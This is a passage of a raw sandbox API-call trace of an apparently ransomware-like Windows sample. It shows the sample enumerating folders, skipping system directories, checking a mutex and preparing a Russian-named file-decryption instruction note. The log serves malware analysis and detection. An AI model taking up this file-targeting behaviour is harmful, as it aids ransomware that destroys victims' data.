out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming") returned 0x2d [0109.201] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1e79fe8, cbMultiByte=46, lpWideCharStr=0x18dd7c, cchWideChar=2047 | out: lpWideCharStr="c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\eft SQL Server Compact Edition\\ition\\") returned 46 [0109.201] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\Microsoft Shared\\EURO\\", cchLength=0x34 | out: lpsz="c:\\program files\\common files\\microsoft shared\\euro\\") returned 0x34 [0109.201] GetEnvironmentVariableA (in: lpName="ProgramData", lpBuffer=0x18e97c, nSize=0x400 | out: lpBuffer="C:\\ProgramData") returned 0xe [0109.201] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1e9ab68, cbMultiByte=15, lpWideCharStr=0x18dd7c, cchWideChar=2047 | out: lpWideCharStr="c:\\programdata\\jn0js halpmcxz\\appdata\\roaming\\eft SQL Server Compact Edition\\ition\\") returned 15 [0109.201] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\Microsoft Shared\\EURO\\", cchLength=0x34 | out: lpsz="c:\\program files\\common files\\microsoft shared\\euro\\") returned 0x34 [0109.201] GetEnvironmentVariableA (in: lpName="WINDIR", lpBuffer=0x18e97c, nSize=0x400 | out: lpBuffer="C:\\Windows") returned 0xa [0109.201] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea9b10, cbMultiByte=11, lpWideCharStr=0x18dd7c, cchWideChar=2047 | out: lpWideCharStr="c:\\windows\\ata\\jn0js halpmcxz\\appdata\\roaming\\eft SQL Server Compact Edition\\ition\\") returned 11 [0109.202] GlobalLock (hMem=0x450004) returned 0x591988 [0109.202] GlobalHandle (pMem=0x591988) returned 0x450004 [0109.202] GlobalUnlock (hMem=0x450004) returned 0 [0109.202] GlobalLock (hMem=0x450004) returned 0x591988 [0109.202] GlobalLock (hMem=0x45000c) returned 0x593998 [0109.202] GlobalHandle (pMem=0x591988) returned 0x450004 [0109.202] GlobalUnlock (hMem=0x450004) returned 0 [0109.202] GlobalHandle (pMem=0x593998) returned 0x45000c [0109.202] GlobalUnlock (hMem=0x45000c) returned 0 [0109.202] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\Microsoft Shared\\EURO\\", cchLength=0x34 | out: lpsz="c:\\program files\\common files\\microsoft shared\\euro\\") returned 0x34 [0109.202] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1e9ab68, cbMultiByte=15, lpWideCharStr=0x18dd84, cchWideChar=2047 | out: lpWideCharStr=":\\$recycle.bin\\s halpmcxz\\appdata\\roaming\\eft SQL Server Compact Edition\\ition\\") returned 15 [0109.202] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\Microsoft Shared\\EURO\\", cchLength=0x34 | out: lpsz="c:\\program files\\common files\\microsoft shared\\euro\\") returned 0x34 [0109.202] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea99f0, cbMultiByte=11, lpWideCharStr=0x18dd84, cchWideChar=2047 | out: lpWideCharStr="\\all users\\bin\\s halpmcxz\\appdata\\roaming\\eft SQL Server Compact Edition\\ition\\") returned 11 [0109.202] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\Microsoft Shared\\EURO\\", cchLength=0x34 | out: lpsz="c:\\program files\\common files\\microsoft shared\\euro\\") returned 0x34 [0109.203] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea99f0, cbMultiByte=9, lpWideCharStr=0x18dd84, cchWideChar=2047 | out: lpWideCharStr="\\appdata\\s\\bin\\s halpmcxz\\appdata\\roaming\\eft SQL Server Compact Edition\\ition\\") returned 9 [0109.203] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\Microsoft Shared\\EURO\\", cchLength=0x34 | out: lpsz="c:\\program files\\common files\\microsoft shared\\euro\\") returned 0x34 [0109.203] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1e9ab68, cbMultiByte=18, lpWideCharStr=0x18dd84, cchWideChar=2047 | out: lpWideCharStr="\\application data\\alpmcxz\\appdata\\roaming\\eft SQL Server Compact Edition\\ition\\") returned 18 [0109.203] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\Microsoft Shared\\EURO\\", cchLength=0x34 | out: lpsz="c:\\program files\\common files\\microsoft shared\\euro\\") returned 0x34 [0109.203] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1d997e8, cbMultiByte=28, lpWideCharStr=0x18dd84, cchWideChar=2047 | out: lpWideCharStr=":\\system volume information\\pdata\\roaming\\eft SQL Server Compact Edition\\ition\\") returned 28 [0109.203] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\Microsoft Shared\\EURO\\", cchLength=0x34 | out: lpsz="c:\\program files\\common files\\microsoft shared\\euro\\") returned 0x34 [0109.203] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea99f0, cbMultiByte=10, lpWideCharStr=0x18dd84, cchWideChar=2047 | out: lpWideCharStr=":\\windows\\olume information\\pdata\\roaming\\eft SQL Server Compact Edition\\ition\\") returned 10 [0109.204] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\Microsoft Shared\\EURO\\", cchLength=0x34 | out: lpsz="c:\\program files\\common files\\microsoft shared\\euro\\") returned 0x34 [0109.204] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea99f0, cbMultiByte=8, lpWideCharStr=0x18dd84, cchWideChar=2047 | out: lpWideCharStr=":\\intel\\s\\olume information\\pdata\\roaming\\eft SQL Server Compact Edition\\ition\\") returned 8 [0109.204] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\Microsoft Shared\\EURO\\", cchLength=0x34 | out: lpsz="c:\\program files\\common files\\microsoft shared\\euro\\") returned 0x34 [0109.204] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea99f0, cbMultiByte=9, lpWideCharStr=0x18dd84, cchWideChar=2047 | out: lpWideCharStr=":\\nvidia\\\\olume information\\pdata\\roaming\\eft SQL Server Compact Edition\\ition\\") returned 9 [0109.204] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\Microsoft Shared\\EURO\\", cchLength=0x34 | out: lpsz="c:\\program files\\common files\\microsoft shared\\euro\\") returned 0x34 [0109.204] SHGetMalloc (in: ppMalloc=0x18edcc | out: ppMalloc=0x18edcc*=0x767666bc) returned 0x0 [0109.204] SHGetSpecialFolderLocation (in: hwnd=0x0, csidl=0, ppidl=0x18edc8 | out: ppidl=0x18edc8) returned 0x0 [0109.205] SHGetPathFromIDListW (in: pidl=0x578208, pszPath=0x57c6b4 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0109.208] SysReAllocStringLen (in: pbstr=0x18ee50*=0x0, psz="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", len=0x25 | out: pbstr=0x18ee50*="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0109.208] IMalloc:Free (This=0x767666bc, pv=0x578208) [0109.208] IUnknown:AddRef (This=0x767666bc) returned 0x1 [0109.208] CharLowerBuffW (in: lpsz="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", cchLength=0x25 | out: lpsz="c:\\users\\5p5nrgjn0js halpmcxz\\desktop") returned 0x25 [0109.208] GlobalLock (hMem=0x45000c) returned 0x591988 [0109.208] GlobalHandle (pMem=0x591988) returned 0x45000c [0109.208] GlobalUnlock (hMem=0x45000c) returned 0 [0109.208] GlobalLock (hMem=0x45000c) returned 0x591988 [0109.208] GlobalLock (hMem=0x450004) returned 0x593998 [0109.208] GlobalHandle (pMem=0x591988) returned 0x45000c [0109.208] GlobalUnlock (hMem=0x45000c) returned 0 [0109.208] GlobalHandle (pMem=0x593998) returned 0x450004 [0109.208] GlobalUnlock (hMem=0x450004) returned 0 [0109.208] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EURO\\*.*", lpFindFileData=0x18eea4 | out: lpFindFileData=0x18eea4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x58c7d970, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x58c7d970, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x58c7d970, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x58b020 [0109.208] FindNextFileW (in: hFindFile=0x58b020, lpFindFileData=0x18eea4 | out: lpFindFileData=0x18eea4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x58c7d970, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x58c7d970, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x58c7d970, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0109.209] FindNextFileW (in: hFindFile=0x58b020, lpFindFileData=0x18eea4 | out: lpFindFileData=0x18eea4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6b4ffc00, ftCreationTime.dwHighDateTime=0x1cac1f6, ftLastAccessTime.dwLowDateTime=0x58c7d970, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6b4ffc00, ftLastWriteTime.dwHighDateTime=0x1cac1f6, nFileSizeHigh=0x0, nFileSizeLow=0x7980, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSOEURO.DLL", cAlternateFileName="")) returned 1 [0109.209] FileTimeToLocalFileTime (in: lpFileTime=0x18eeb8, lpLocalFileTime=0x18edc8 | out: lpLocalFileTime=0x18edc8) returned 1 [0109.209] FileTimeToDosDateTime (in: lpFileTime=0x18edc8, lpFatDate=0x18ee86, lpFatTime=0x18ee84 | out: lpFatDate=0x18ee86, lpFatTime=0x18ee84) returned 1 [0109.209] GlobalLock (hMem=0x450004) returned 0x591988 [0109.209] GlobalHandle (pMem=0x591988) returned 0x450004 [0109.209] GlobalUnlock (hMem=0x450004) returned 0 [0109.209] GlobalLock (hMem=0x450004) returned 0x591988 [0109.209] GlobalLock (hMem=0x45000c) returned 0x593998 [0109.209] GlobalHandle (pMem=0x591988) returned 0x450004 [0109.209] GlobalUnlock (hMem=0x450004) returned 0 [0109.209] GlobalHandle (pMem=0x593998) returned 0x45000c [0109.209] GlobalUnlock (hMem=0x45000c) returned 0 [0109.209] OpenMutexA (dwDesiredAccess=0x1f0001, bInheritHandle=0, lpName="{46E4D4E6-8B81-84CA-93DA-BB29377B2AC0}") returned 0x0 [0109.209] CharLowerBuffW (in: lpsz="MSOEURO.DLL", cchLength=0xb | out: lpsz="msoeuro.dll") returned 0xb [0109.209] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="l", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lí\x18", lpUsedDefaultChar=0x0) returned 1 [0109.209] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="l", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lí\x18", lpUsedDefaultChar=0x0) returned 1 [0109.209] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="d", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dí\x18", lpUsedDefaultChar=0x0) returned 1 [0109.210] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=".", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=".í\x18", lpUsedDefaultChar=0x0) returned 1 [0109.210] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="o", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="oí\x18", lpUsedDefaultChar=0x0) returned 1 [0109.210] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="r", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="rí\x18", lpUsedDefaultChar=0x0) returned 1 [0109.210] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="u", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uí\x18", lpUsedDefaultChar=0x0) returned 1 [0109.210] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="e", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="eí\x18", lpUsedDefaultChar=0x0) returned 1 [0109.210] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="o", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="oí\x18", lpUsedDefaultChar=0x0) returned 1 [0109.210] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="s", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sí\x18", lpUsedDefaultChar=0x0) returned 1 [0109.210] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="m", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mí\x18", lpUsedDefaultChar=0x0) returned 1 [0109.210] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1e6ac78, cbMultiByte=36, lpWideCharStr=0x18dd64, cchWideChar=2047 | out: lpWideCharStr="Èíñòðóêöèÿ ïî ðàñøèôðîâêå ôàéëîâ.txt\x06") returned 36 [0109.210] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\Microsoft Shared\\EURO\\MSOEURO.DLL", cchWideChar=63, lpMultiByteStr=0x18dd40, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\Microsoft Shared\\EURO\\MSOEURO.DLL", lpUsedDefaultChar=0x0) returned 63 [0109.210] CharLowerBuffW (in: lpsz=".DLL", cchLength=0x4 | out: lpsz=".dll") returned 0x4 [0109.210] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=".dll", cchWideChar=4, lpMultiByteStr=0x18dd64, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=".dllShared\\EURO\\MSOEURO.DLL", lpUsedDefaultChar=0x0) returned 4 [0109.210] FindNextFileW (in: hFindFile=0x58b020, lpFindFileData=0x18eea4 | out: lpFindFileData=0x18eea4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6b4ffc00, ftCreationTime.dwHighDateTime=0x1cac1f6, ftLastAccessTime.dwLowDateTime=0x58c7d970, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6b4ffc00, ftLastWriteTime.dwHighDateTime=0x1cac1f6, nFileSizeHigh=0x0, nFileSizeLow=0x7980, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSOEURO.DLL", cAlternateFileName="")) returned 0 [0109.210] GetLastError () returned 0x12 [0109.210] FindClose (in: hFindFile=0x58b020 | out: hFindFile=0x58b020) returned 1 [0109.210] GlobalLock (hMem=0x45000c) returned 0x591988 [0109.210] GlobalHandle (pMem=0x591988) returned 0x45000c [0109.210] GlobalUnlock (hMem=0x45000c) returned 0 [0109.210] GlobalLock (hMem=0x45000c) returned 0x591988 [0109.211] GlobalLock (hMem=0x450004) returned 0x593998 [0109.211] GlobalHandle (pMem=0x591988) returned 0x45000c [0109.211] GlobalUnlock (hMem=0x45000c) returned 0 [0109.211] GlobalHandle (pMem=0x593998) returned 0x450004 [0109.211] GlobalUnlock (hMem=0x450004) returned 0 [0109.211] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EURO\\*.*", lpFindFileData=0x18eea4 | out: lpFindFileData=0x18eea4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x58c7d970, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x58c7d970, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x58c7d970, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x58b020 [0109.211] FileTimeToLocalFileTime (in: lpFileTime=0x18eeb8, lpLocalFileTime=0x18edc8 | out: lpLocalFileTime=0x18edc8) returned 1 [0109.211] FileTimeToDosDateTime (in: lpFileTime=0x18edc8, lpFatDate=0x18ee86, lpFatTime=0x18ee84 | out: lpFatDate=0x18ee86, lpFatTime=0x18ee84) returned 1 [0109.211] GlobalLock (hMem=0x450004) returned 0x591988 [0109.211] GlobalHandle (pMem=0x591988) returned 0x450004 [0109.211] GlobalUnlock (hMem=0x450004) returned 0 [0109.211] GlobalLock (hMem=0x450004) returned 0x591988 [0109.211] GlobalLock (hMem=0x45000c) returned 0x593998 [0109.211] GlobalHandle (pMem=0x591988) returned 0x450004 [0109.211] GlobalUnlock (hMem=0x450004) returned 0 [0109.211] GlobalHandle (pMem=0x593998) returned 0x45000c [0109.211] GlobalUnlock (hMem=0x45000c) returned 0 [0109.211] OpenMutexA (dwDesiredAccess=0x1f0001, bInheritHandle=0, lpName="{46E4D4E6-8B81-84CA-93DA-BB29377B2AC0}") returned 0x0 [0109.211] FindNextFileW (in: hFindFile=0x58b020, lpFindFileData=0x18eea4 | out: lpFindFileData=0x18eea4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x58c7d970, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x58c7d970, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x58c7d970, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0109.211] FileTimeToLocalFileTime (in: lpFileTime=0x18eeb8, lpLocalFileTime=0x18edc4 | out: lpLocalFileTime=0x18edc4) returned 1 [0109.211] FileTimeToDosDateTime (in: lpFileTime=0x18edc4, lpFatDate=0x18ee86, lpFatTime=0x18ee84 | out: lpFatDate=0x18ee86, lpFatTime=0x18ee84) returned 1 [0109.212] GlobalLock (hMem=0x45000c) returned 0x591988 [0109.212] GlobalHandle (pMem=0x591988) returned 0x45000c [0109.212] GlobalUnlock (hMem=0x45000c) returned 0 [0109.212] GlobalLock (hMem=0x45000c) returned 0x591988 [0109.212] GlobalLock (hMem=0x450004) returned 0x593998 [0109.212] GlobalHandle (pMem=0x591988) returned 0x45000c [0109.212] GlobalUnlock (hMem=0x45000c) returned 0 [0109.212] GlobalHandle (pMem=0x593998) returned 0x450004 [0109.212] GlobalUnlock (hMem=0x450004) returned 0 [0109.212] OpenMutexA (dwDesiredAccess=0x1f0001, bInheritHandle=0, lpName="{46E4D4E6-8B81-84CA-93DA-BB29377B2AC0}") returned 0x0 [0109.212] FindNextFileW (in: hFindFile=0x58b020, lpFindFileData=0x18eea4 | out: lpFindFileData=0x18eea4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6b4ffc00, ftCreationTime.dwHighDateTime=0x1cac1f6, ftLastAccessTime.dwLowDateTime=0x58c7d970, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6b4ffc00, ftLastWriteTime.dwHighDateTime=0x1cac1f6, nFileSizeHigh=0x0, nFileSizeLow=0x7980, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSOEURO.DLL", cAlternateFileName="")) returned 1 [0109.212] FileTimeToLocalFileTime (in: lpFileTime=0x18eeb8, lpLocalFileTime=0x18edc4 | out: lpLocalFileTime=0x18edc4) returned 1 [0109.212] FileTimeToDosDateTime (in: lpFileTime=0x18edc4, lpFatDate=0x18ee86, lpFatTime=0x18ee84 | out: lpFatDate=0x18ee86, lpFatTime=0x18ee84) returned 1 [0109.212] GlobalLock (hMem=0x450004) returned 0x591988 [0109.212] GlobalHandle (pMem=0x591988) returned 0x450004 [0109.212] GlobalUnlock (hMem=0x450004) returned 0 [0109.212] GlobalLock (hMem=0x450004) returned 0x591988 [0109.212] GlobalLock (hMem=0x45000c) returned 0x593998 [0109.212] GlobalHandle (pMem=0x591988) returned 0x450004 [0109.212] GlobalUnlock (hMem=0x450004) returned 0 [0109.212] GlobalHandle (pMem=0x593998) returned 0x45000c [0109.212] GlobalUnlock (hMem=0x45000c) returned 0 [0109.212] OpenMutexA (dwDesiredAccess=0x1f0001, bInheritHandle=0, lpName="{46E4D4E6-8B81-84CA-93DA-BB29377B2AC0}") returned 0x0 [0109.212] FindNextFileW (in: hFindFile=0x58b020, lpFindFileData=0x18eea4 | out: lpFindFileData=0x18eea4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6b4ffc00, ftCreationTime.dwHighDateTime=0x1cac1f6, ftLastAccessTime.dwLowDateTime=0x58c7d970, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6b4ffc00, ftLastWriteTime.dwHighDateTime=0x1cac1f6, nFileSizeHigh=0x0, nFileSizeLow=0x7980, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSOEURO.DLL", cAlternateFileName="")) returned 0 [0109.213] GetLastError () returned 0x12 [0109.213] FindClose (in: hFindFile=0x58b020 | out: hFindFile=0x58b020) returned 1 [0109.213] FindNextFileW (in: hFindFile=0x587720, lpFindFileData=0x18f1e4 | out: lpFindFileData=0x18f1e4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5969b6f0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0xd9df3dc0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xd9df3dc0, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Filters", cAlternateFileName="")) returned 1 [0109.213] FileTimeToLocalFileTime (in: lpFileTime=0x18f1f8, lpLocalFileTime=0x18f104 | out: lpLocalFileTime=0x18f104) returned 1 [0109.213] FileTimeToDosDateTime (in: lpFileTime=0x18f104, lpFatDate=0x18f1c6, lpFatTime=0x18f1c4 | out: lpFatDate=0x18f1c6, lpFatTime=0x18f1c4) returned 1 [0109.213] GlobalLock (hMem=0x45000c) returned 0x591988 [0109.213] GlobalHandle (pMem=0x591988) returned 0x45000c [0109.213] GlobalUnlock (hMem=0x45000c) returned 0 [0109.213] GlobalLock (hMem=0x45000c) returned 0x591988 [0109.213] GlobalLock (hMem=0x450004) returned 0x593998 [0109.213] GlobalHandle (pMem=0x591988) returned 0x45000c [0109.213] GlobalUnlock (hMem=0x45000c) returned 0 [0109.213] GlobalHandle (pMem=0x593998) returned 0x450004 [0109.213] GlobalUnlock (hMem=0x450004) returned 0 [0109.213] OpenMutexA (dwDesiredAccess=0x1f0001, bInheritHandle=0, lpName="{46E4D4E6-8B81-84CA-93DA-BB29377B2AC0}") returned 0x0 [0109.214] GlobalLock (hMem=0x450004) returned 0x591988 [0109.214] GlobalHandle (pMem=0x591988) returned 0x450004 [0109.214] GlobalUnlock (hMem=0x450004) returned 0 [0109.214] GlobalLock (hMem=0x450004) returned 0x591988 [0109.214] GlobalLock (hMem=0x45000c) returned 0x593998 [0109.214] GlobalHandle (pMem=0x591988) returned 0x450004 [0109.214] GlobalUnlock (hMem=0x450004) returned 0 [0109.214] GlobalHandle (pMem=0x593998) returned 0x45000c [0109.214] GlobalUnlock (hMem=0x45000c) returned 0 [0109.214] OpenMutexA (dwDesiredAccess=0x1f0001, bInheritHandle=0, lpName="{46E4D4E6-8B81-84CA-93DA-BB29377B2AC0}") returned 0x0 [0109.214] SysReAllocStringLen (in: pbstr=0x18f104*=0x0, psz="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters", len=0x36 | out: pbstr=0x18f104*="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters") returned 1 [0109.214] GlobalLock (hMem=0x45000c) returned 0x591988 [0109.214] GlobalHandle (pMem=0x591988) returned 0x45000c [0109.214] GlobalUnlock (hMem=0x45000c) returned 0 [0109.214] GlobalLock (hMem=0x45000c) returned 0x591988 [0109.214] GlobalLock (hMem=0x450004) returned 0x593998 [0109.214] GlobalHandle (pMem=0x591988) returned 0x45000c [0109.214] GlobalUnlock (hMem=0x45000c) returned 0 [0109.214] GlobalHandle (pMem=0x593998) returned 0x450004 [0109.214] GlobalUnlock (hMem=0x450004) returned 0 [0109.215] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\Microsoft\\Exchange Server", lpFindFileData=0x18eb80 | out: lpFindFileData=0x18eb80*(dwFileAttributes=0xfa83bc83, ftCreationTime.dwLowDateTime=0x5959a8, ftCreationTime.dwHighDateTime=0x553a80, ftLastAccessTime.dwLowDateTime=0x421c168f, ftLastAccessTime.dwHighDateTime=0x550000, ftLastWriteTime.dwLowDateTime=0x6f747365, ftLastWriteTime.dwHighDateTime=0x3b6572, nFileSizeHigh=0x0, nFileSizeLow=0x553a80, dwReserved0=0x2000002, dwReserved1=0xd646935e, cFileName="⃈Ђ", cAlternateFileName="䱈@鼦W黺W企@\x18㽜V\x18\x1b")) returned 0xffffffff [0109.219] GetLastError () returned 0x3 [0109.219] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\", cchLength=0x37 | out: lpsz="c:\\program files\\common files\\microsoft shared\\filters\\") returned 0x37 [0109.219] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1e4d360, cbMultiByte=26, lpWideCharStr=0x18dd84, cchWideChar=2047 | out: lpWideCharStr="microsoft\\exchange server\\\x1b") returned 26 [0109.219] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1d997e8, cbMultiByte=21, lpWideCharStr=0x18ddcc, cchWideChar=2047 | out: lpWideCharStr="Microsoft SQL Server\\rver\\ct Edition\\ition\\") returned 21 [0109.219] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\Microsoft SQL Server", lpFindFileData=0x18eb80 | out: lpFindFileData=0x18eb80*(dwFileAttributes=0xfa83bc83, ftCreationTime.dwLowDateTime=0x5959a8, ftCreationTime.dwHighDateTime=0x553a80, ftLastAccessTime.dwLowDateTime=0x421c168f, ftLastAccessTime.dwHighDateTime=0x550000, ftLastWriteTime.dwLowDateTime=0x6f747365, ftLastWriteTime.dwHighDateTime=0x3b6572, nFileSizeHigh=0x0, nFileSizeLow=0x553a80, dwReserved0=0x2000002, dwReserved1=0xd646935e, cFileName="⃈Ђ", cAlternateFileName="仔W䱠@麌W企@\x18㼔V\x181")) returned 0xffffffff [0109.220] GetLastError () returned 0x2 [0109.220] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\", cchLength=0x37 | out: lpsz="c:\\program files\\common files\\microsoft shared\\filters\\") returned 0x37 [0109.220] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1e4d360, cbMultiByte=21, lpWideCharStr=0x18dd84, cchWideChar=2047 | out: lpWideCharStr="microsoft sql server\\\x18\x15") returned 21 [0109.220] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1d997e8, cbMultiByte=9, lpWideCharStr=0x18ddcc, cchWideChar=2047 | out: lpWideCharStr="Firebird\\ SQL Server\\rver\\ct Edition\\ition\\") returned 9 [0109.220] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\Firebird", lpFindFileData=0x18eb80 | out: lpFindFileData=0x18eb80*(dwFileAttributes=0xfa83bc83, 